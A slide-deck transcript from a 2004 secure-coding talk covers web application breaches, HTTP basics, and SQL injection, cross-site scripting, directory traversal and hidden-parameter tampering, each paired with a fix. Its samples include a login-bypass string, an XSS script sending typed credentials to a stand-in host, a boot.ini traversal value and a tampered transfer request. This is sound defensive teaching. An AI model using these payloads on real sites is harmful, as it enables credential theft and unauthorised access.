Dennis Hurst SPI Dynamics Inc - StickyMinds · RIAA was hacked 8 times in 6 months The 6th time the...

BIO PRESENTATION

Better Software Conference & EXPO September 27-30, 2004

San Jose, CA USA

T16

September 30, 2004 3:00 PM

DEVELOPING SECURE WEB

APPLICATIONS

Dennis Hurst SPI Dynamics Inc

Dennis HurstDennis Hurst, senior consulting engineer for SPI Dynamics, is responsible for working withdevelopers to educate them on the need for Web Application security and practical ways toprotect Web Applications from hacking attacks.

With more than 15 years experience in the Information Systems/Application developmentindustry, he is an expert in system design, implementation and maintenance of complex multi-vendor, multi-platform computer applications and networks. He has extensive experience inplanning developing and enhancing Internet systems as well as integrating Internet systemswith legacy systems. For the past three years he has focused on developing tools to test andsecure the HTTP protocol.

Dennis is a Microsoft Certified Solution Developer (MSCD in Visual Basic and SQL Server) anda Certified Novell Engineer (CNE) for version 3.x and 4.x. Furthermore, he has publishedarticles and developed classes on the secure application development process. Dennis hasspoken on the topic of secure coding practices at Software Development West 2004, WebSec2003 and various user group chapter meetings. He has been published in asp.net PRO and onhttp://www.15seconds.com/Issue/000612.htm.

Hacker Exploits, Coding Best Practices and Automated Code Testing Tools

Developing Secure Web Applications

Agenda

PART 1: Introductions

PART 2: What is Web Application Security?

PART 3: Web Application Hacks & Application Risks

PART 4: Web Applications and HTTP 101

PART 5: Web Application Attacks

PART 6: Managing & Detecting Vulnerabilities

SPI Dynamics

SPI Dynamics delivers security products and services that protect enterprises at the web application layer. These products are backed by the industry’s leading security experts, SPI Labs.

WebInspect is our industry leading web application security assessment product line and is licensed to enterprises, consultants, and other institutions, both directly and via global partners.

The Expert in Web Application Security Assessment

SPI Dynamics believes that security must be implemented across the application lifecycle. The earlier a security defect is detected the less it will ultimately cost an organization.

SPI Dynamics is dedicated to maintaining a leadership position in vulnerability assessment and we truly measure our success through the success of our customers.

SPI Dynamics

The Expert in Web Application Security Assessment

PART 2

What is Web Application Security?

The evolution from web sites to web applicationsWhere does the risk come from?

Web Sites

Web ServerHTML

Browser

Simple, single server solutions

Web Applications

Browser

Web Servers

Presentation Layer

Media Store

Very complex architectures, multiple platforms, multiple protocols

Database Server

Customer Identification

Access Controls

Transaction Information

Core Business Data

Wireless

Web Services

Application Server

Business Logic

Content Services

Web Applications Invite Public Access

“Today over 70% of attacks against a company’s website or web application come at the ‘Application Layer’ not the Network or System layer.”

- Gartner

Web Applications Breach the Perimeter

HTTP(S)

INTER

NET

DM

ZTR

USTED

INSID

EC

OR

POR

ATE

INSID

E

FTP TELNET

Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server.

Any – Web Server: 80

Firewall only allows applications on the web server to talk to application server.

Web Server Application Server

Firewall only allows application

server to talk to database server.

Application Server Database

IMAP SSH POP3

IISSunOneApache

ASP.NET

WebSphereJava

SQLOracle

DB2

PART 3

Web Application Hacks and Application Risks

Who got hacked?How they got hacked, what method was used?What was the result of being hacked?Why web application risks occurWeb application vulnerabilities

Web Application Risk

“Web application incidents cost companies more than $320,000,000 in 2001.”

Forty-four percent (223 respondents) to the 2002 Computer Crime and Security Survey were willing and/or able to quantify their financial losses. These 223 respondents reported $455,848,000 in financial losses.

“2002 Computer Crime and Security Survey”

Computer Security Institute & San Francisco FBI Computer Intrusion Squad

Ziff DavisHacked August 2002Ziff Davis Media has agreed to revamp its website's security and pay affected customers $500 each after lax security exposed the personal data of thousands of subscribers last year.The agreement between Ziff Davis -- publisher of PC Magazine and other tech titles, including a slew of gaming magazines -- and attorneys general from New York, Vermont and California came after web surfers discovered an unprotected data file on Ziff Davis' site in November. The file contained names, addresses, e-mail addresses -- and, in some instances, credit card numbers -- of 12,000 people who signed up for a special promotion to receive Electronic Gaming Monthly magazine.

Recent Web Application Hack Example

Recent Web Application Hacks

Victoria’s Secret, November 27, 2002A vulnerability at the Victoria’s Secret web site allowed customers who purchased items there to view other customers’ orders.By simply changing the data in the URL address line the web application was manipulated.$50,000 fine and publicity in 2003

Victoria’s Secret

Recent Web Application Hacks

January 3, 2003RIAA was hacked 8 times in 6 months The 6th time the RIAA site was hacked, downloadable, pirated music was postedThis time, a URL allowing access to the RIAA's system for posting press releases was made publicly accessible, allowing people to post messages that then appeared on the RIAA's official press release page

Recording Industry Association of America

Sept 25th 2003: Car Shoppers Credit Details Exposed in Bulk

An administrative page not properly secured and any personal loan application information could be viewed.Over 1,000 shoppers from multiple websites had their entire financial history exposed on a public site

The researcher simply read the HTML comments, saw the filename, and typed it into his browser.

“The exposure of personal financial information could also put Dealerskins and its customers afoul of Federal Trade Commission (FTC) regulations “

Gateway Computers

Wall Street Journal Article “More Scary Tales Involving Big Holes in Website Security”, by Lee Gomes, February 2nd 2004

Gateway’s website stored an ID number in a cookie to identify you when returning to the site. By changing this ID number, you are able to view the information of other shoppers. Information viewable includes Name, Address, Phone Number, Order History, Last Four Digits of Credit Card, Credit Card Expiration Date, Credit Card Verification Code.

Federal Trade Commission investigates Guess Inc.

“Guess Settles with FTC over Cyber Security Snafu”, June 2003 by Kevin Poulson for SecurityFocus

“ Guess.com was open to an "SQL injection attack," permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database -- over 200,000 in all …The episode prompted a year-long FTC investigation into alleged deceptive trade practices by Guess “

"Consumers have every right to expect that a business that says it's keeping personal information secure is doing exactly that," said Howard Beales, Director of the FTC's consumer protection bureau, in a press release. "It's not just good business, it's the law."

Other Hacked Websites

Tiffany.Com - 2004 SQL Injection,OpenTable.com : Non-random identifiersSaks Fifth Avenue: Non-random identifiersFTD.com – February 14, 2003 sequential cookies

Source: CNET News “FTD Hole Leaks Personal Information “Travelocity - January 22, 2001 open directory

Source: CNET News “Travelocity Exposes Customer Information”

Creditcards.com – December 12, 2000 SQL InjectionSource: CNET News “Company says extortion try exposes thousands of card numbers “

CD Universe – January 9, 2000 SQL InjectionSource: Internetnews.com “Failed Blackmail Attempt Leads to Credit Card Theft”

MasterCard - February 17, 2003 Partner LiabilityTower Records - December 5, 2002 Access permissions

Security Professionals Don’t Know The Applications

The Web ApplicationSecurity Gap

Application Developers and QA Professionals Don’t Know Security

Why Web Application Risks Occur

Developers Are Not Security ProfessionalsApplication development stresses functionality, not securityLack of awareness of security issues in developmentLack of effective testing tools in Development & QAResource constrained development teams

Security Professionals Are Not DevelopersLack of awareness of application vulnerabilities in security teamsLack of effective testing tools Certification and accreditations don’t examine the web applicationDevelopment cycle missing from security procedures and auditsSecurity scrutinizes the desktop, the network, and the server. The web application is missing.

Why Web Application Risks Occur

Web Application Vulnerabilities

Platform

Administration

Application

Known Vulnerabilities

Extension Checking

Common File Checks

Data Extension Checking

Backup Checking

Directory Enumeration

Path Truncation

Hidden Web Paths

Forceful Browsing

Parameter Manipulation

Cross-Site Scripting

SQL Injection

Buffer Overflow

Reverse Directory Transversal

JAVA Decompilation

Path Truncation

Hidden Web Paths

Cookie Manipulation

Application Mapping

Backup Checking


Web application vulnerabilities occur in multiple areas.

PlatformKnown Vulnerabilities

Platform:• Known vulnerabilities can be

exploited immediately with a minimum amount of skill or experience – “script kiddies”

• Most easily defendable of all web vulnerabilities

• MUST have streamlined patching procedures

• MUST have inventory process


AdministrationExtension Checking

Common File Checks

Data Extension Checking

Backup Checking


Path Truncation

Hidden Web Paths

Forceful Browsing

Administration:• Less easily corrected than known issues• Require increased awareness• More than just configuration, must be

aware of security flaws in actual content

• Remnant files can reveal applications and versions in use

• Backup files can reveal source code and database connection strings


Application Programming:

• User input is not examined from a security perspective.

• Unexpected code• Error messages……

Application


Parameter Manipulation

Cross-Site Scripting

SQL Injection

Buffer Overflow

Reverse Directory Transversal

JAVA Decompilation

Path Truncation

Hidden Web Paths

Cookie Manipulation

Application Mapping

Backup Checking


PART 4

Web Applications and HTTP 101

What are the components of a web application?How are these components secured?How does HTTP (the web) work?How does a hacker see your application?

The OSI Reference Model

Physical

Datalink

Network

Transport

Session

Presentation

Web based attacks (HTTP/HTTPS)

Network / OS / Service attacks

Layer 1 through 6 deal with how data is delivered.

Layer 7 deals with business logic (content and interpretation).

Application

Network

What is a Web-Based Application?

What is the data path (Network) for web applications?How does a web-based application work (HTTP)?How does your application work?

HTTP

Web Application

How Do Web Applications Communicate?

Network

HTTP

Web Application

Network Layer

Client connects to the serverClient sends request to serverServer responds to clientConnection is disconnected

HTTP is stateless

Request

Response

Server

www.mybank.com

(64.58.76.230)

Port: 80Client PC

(10.1.0.123)

How Do Web Applications Communicate?

Network Layer

SSL (Secure Sockets Layer)Provided encryption of data between a client and server.Typically guarantees to client that server is who it asserts itself to be.

Securing the Network Layer

SSL Tunnel

Server

www.mybank.com

(64.58.76.230)

Port: 443Client PC

(10.1.0.123)


SSL Firewalls

Allows or disallows traffic to pass from the external network to the internal network.Acts as a “traffic cop”Port 80 (HTTP) and port 443 (HTTPS) travel freely through the firewall.

SSL Tunnel

Server

www.mybank.com

(64.58.76.230)

Port: 443Client PC

(10.1.0.123)


SSLFirewalls IDS (Intrusion Detection System)

Monitors network for malicious activitiesTypically signature based detection (similar to virus protection) Blind to encrypted (SSL) traffic.

IDS

SSL Tunnel

Server

www.mybank.com

(64.58.76.230)

Port: 443

Client PC

(10.1.0.123)

What is HTTP?

Network

HTTP

Web Application

What is HTTP?

HTML Page<a href=http://www.test.me>Click Here</a>

Request

Response

GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.spidynamics.comConnection: Keep-Alive

HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Mon, 07 Apr 2003 12:52:26 GMTContent-Length: 10225Content-Type: text/htmlCache-control: private

Set-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/;

<html><body>

Request

Response

ServerClient PC

HTML Page<a href=http://www.test.me>Click Here</a>Request

GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.spidynamics.comConnection: Keep-Alive

ResponseHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Mon, 07 Apr 2003 12:52:26 GMTContent-Length: 10225Content-Type: text/htmlCache-control: privateSet-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/;

<html><body>

How Does Your Application Work?

GET – Simple query string based requestPOST – Contains POST data in the body of the request.

NetworkHTTP

Web Application

HTTP – GET With a Query String

HTML Page<a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>

Request

Response

GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&ID=5 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comConnection: Keep-AliveCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN

HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:17:50 GMTContent-Length: 4183Content-Type: text/htmlCache-control: privateSet-Cookie: sessionid=25; path=/; Set-Cookie: state=GA; path=/; Set-Cookie: username=MrUser; path=/; Set-Cookie: userid=1538; path=/;

<HTML><HEAD><TITLE></TITLE></HEAD><BODY>

HTML Page<a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>RequestGET /banklogin.asp?serviceName=FreebankCaastAccess& templateName=prod_sel.forte&ID=5 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comConnection: Keep-AliveCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN

ResponseHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:17:50 GMTContent-Length: 4183Content-Type: text/htmlCache-control: privateSet-Cookie: sessionid=25; path=/; Set-Cookie: state=GA; path=/; Set-Cookie: username=MrUser; path=/; Set-Cookie: userid=1538; path=/;

<HTML><HEAD><TITLE></TITLE></HEAD><BODY>

HTTP – POST With POST Data

Form

Request

Response

<FORM ACTION="login1.asp" METHOD=“POST"><br>Username:<INPUT TYPE="text" NAME="login"><BR>Password:<INPUT TYPE="password" NAME="password" ><BR><INPUT TYPE="submit"><BR></FORM>

POST /login1.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/*Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccessAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comContent-Length: 23Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA;……

login=John&password=Doe

HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:35:00 GMTContent-Length: 80Content-Type: text/htmlCache-control: private

<html><body>Welcome John. …………..</body></html>

Form<FORM ACTION="login1.asp" METHOD=“POST"><br>Username:<INPUT TYPE="text" NAME="login"><BR>Password:<INPUT TYPE="password" NAME="password" ><BR><INPUT TYPE="submit"><BR></FORM>

RequestPOST /login1.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/*Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccessAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comContent-Length: 23Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA;……

login=John&password=Doe

ResponseHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:35:00 GMTContent-Length: 80Content-Type: text/htmlCache-control: private

<html><body>Welcome John. …………..</body></html>

PART 5

Web Application Attacks

QuestionDefine – What is it and what is at stake?Result – How does it happen?Fix – How to fix web application vulnerabilities?

Types of AttacksSQL InjectionCross Site Scripting (XSS)Directory TraversalHidden parameters

SQL Injection – Defined

SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first.

SQL Injection – Simple Example

‘/‘/ Login SQL Statemet‘/SQLtemp = "SELECT * FROM Users " & _

"WHERE userID = '" & Request.form("username") & "' " & _ "and pass = '" & Request.Form("password") & "'"

Set rs = Apples.Execute(SQLtemp)If not rs.eof then

‘/ Successful login!!…..

‘/‘/ Login SQL Statemet‘/SQLtemp = "SELECT * FROM Users " & _ "WHERE userID = '" & Request.form("username") & "' " & _ "and pass = '" & Request.Form("password") & "'"

Set rs = Apples.Execute(SQLtemp)If not rs.eof then‘/ Successful login!!…..


Return Response

SQL Example


What the hacker knowsThe web page is creating a SQL statement that takes two parameters.The parameters are both strings.The parameters are, most likely, being passed to the database unfiltered.

The hacker can now guess that the SQL statement looks something like this:

The hack can now start making educated guesses:

Select <something> from <sometable> where <fieldone> = ‘<user input one>’And <fieldtwo> = ‘<user input two>’

Select <something> from <sometable> where <fieldone> = ‘' or 1=1 or 'a' ='’And <fieldtwo> = ‘' or 1=1 or 'a' ='’


SQL Example

SQL Injection – Solution

Use parameterized queries

Trap your Errors!!! Don’t let the environmentUse Stored ProceduresValidate User InputTurn off default error messages

cnn = new SqlConnection(…database connection information here…);

cmd = new SqlCommand("SELECT FirstName, LastName from Users “

+ "WHERE UserName = @uid AND password = @passwd",cnn);

cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value=uid;

cmd.Parameters.Add("@passwd", SqlDbType.VarChar,100).Value = passwd;

cnn.Open();

Cross Site Scripting (XSS)

Cross-site scripting (also know as XSS or CSS) occurs when dynamically generated web pages display input that is not property validated.A user passes input in the form of a parameter to the web server.The web server returns the user provided input back to the user without proper encoding.

http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20<script>alert(document.cookie)</script>

Cross Site Scripting (XSS)

<input type=text name=txtUserID ….

<input type=text name=txtPassword…

HTML

var oImg = new Image;

oImg.src = "http://www.test.me/"

+ document.frmTest.txtUserID.value + "."

+ document.frmTest.txtPassword.value;

XSS JavaScript

Web Log

…. 127.0.0.1 GET /test/xss.asp 200

…. 127.0.0.1 GET /MyUserID.MyPassword 404

…. 127.0.0.1 GET /test/xss.asp 200

Cross Site Scripting (XSS) - Solution

HTML Encode all data before it is RETURNED to a users web browser.

Data that comes from a userData that comes from a databaseData that comes from any dynamic source

Server.HTMLEncode provides this functionalityValidate user input

Directory Traversal – Result

This is a standard site that shows a list of available documents in the FAQ folder.


Clicking on one of the links shows the selected document.Notice the parameter ?Template=Check+Card%2Etxt. When you URL Decode that parameter it will look like:

?Template=Check Card.txtThis could be a file name.


Changing the Template parameter to ../../../../../boot.ini opened the boot.ini file.A hacker now has full access to any file on the hard drive.

Directory Traversal – The Code

The vulnerable code

Secure version of the code

sFile = Request("Template“) ‘/Get the parameterif sFile <> "" then

‘/User passed a parameter if fso.FileExists(sDir & "\" & sFile) then set oStream = fso.OpenTextFile(sDir & "\" & sFile,1, false)

sFile = Request("Template“) ‘/Get the parameter

'/Quick security check if Regex.Match(sFile, “[^a-zA-Z0-9.]”) <> “” then ‘/Look for invalid characters

sFile = "“ ‘/Looks odd, don’t accept it end if

if sFile <> "" then‘/User passed a parameter if fso.FileExists(sDir & "\" & sFile) then set oStream = fso.OpenTextFile(sDir & "\" & sFile,1, false)

Directory Traversal - Fix

Avoid using a parameter as a file name.When using a parameter as a file name use EXTREME caution to ensure that the name passed in is a valid file name and is not trying to reference a file in a parent folder.Limit the web server to only access appropriate folders on the web server and not parent folders outside the web site file structure.….and….. Validate user input

Hidden Parameters

Hidden parameters allow developers to pass variables to and from a web browser in the same way other <input> tags do, however they are not seen by the end user.The format is <input type=hidden name=myname value=myvalue>The primary danger in using hidden parameters is that they can be modified by a hacker and are seldom tested during the development and QA process.

Hidden Parameters - Example

Hidden Parameters – The Hack

Request before the hack

Request after the hack

POST /BankSite/xferconfirm.asp HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http://www.nubank.me/BankSite/acctxfer.aspAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)Host: www.nubank.meContent-Length: 103Connection: CloseCache-Control: no-cacheCookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM

fromAcct=120199789890&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfer

POST /BankSite/xferconfirm.asp HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http://www.nubank.me/BankSite/acctxfer.aspAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)Host: www.nubank.meContent-Length: 103Connection: CloseCache-Control: no-cacheCookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM

fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfe

Hidden Parameters – The Hack

Hidden Parameters – The Fix

Never assume a hidden parameter has not been tampered with by the end user.Never put secure information in a hidden parameter.Ensure that proper QA testing of all hidden parameters is done prior to going live with any application.Add proper hidden parameter use guidelines to development methodology documents and processes.….and again….validate user input

The fix – Trust buy verify

Validate ALL user inputValidate every time you use user inputEverything in a request is “user input”

PART 6

Managing and Detecting Web Application Vulnerabilities

Building a secure development processWeb application ROIDetecting web application vulnerabilitiesManaging and addressing web application security risk throughout the enterprise

Application Lifecycle Phases

Design Development

TestingProduction

Security Operations and Auditors

Developers

QA and Developers

Auditors, Dev, and Business Subject Matter Experts (SME)

Managing Web Application Security Risk

Educate the development team.

Develop and publish best practices.

Develop secure code

Test and verify that code is developed securely

Perform routine audits of production systems.

Establish remediation procedures.

Keep track of security trends.

Bring security to the development team…

Detecting Web Application Vulnerabilities

Time consuming

Expensive

Not repeatable

Time consuming

Rely on third party individuals (penetration testers)

High performance, automated web application assessment

Cost effective

Scalable throughout entire application lifecycle

Consistent high quality assessments

Provides economy of scale (SPI Labs)

Customizable (Custom Agents)

Manual vs. Automatic Testing

Q&A

Questions?

Dennis Hurst SPI Dynamics Inc - StickyMinds · RIAA was hacked 8 times in 6 months The 6th time the...

Documents

Transcript of Dennis Hurst SPI Dynamics Inc - StickyMinds · RIAA was hacked 8 times in 6 months The 6th time the...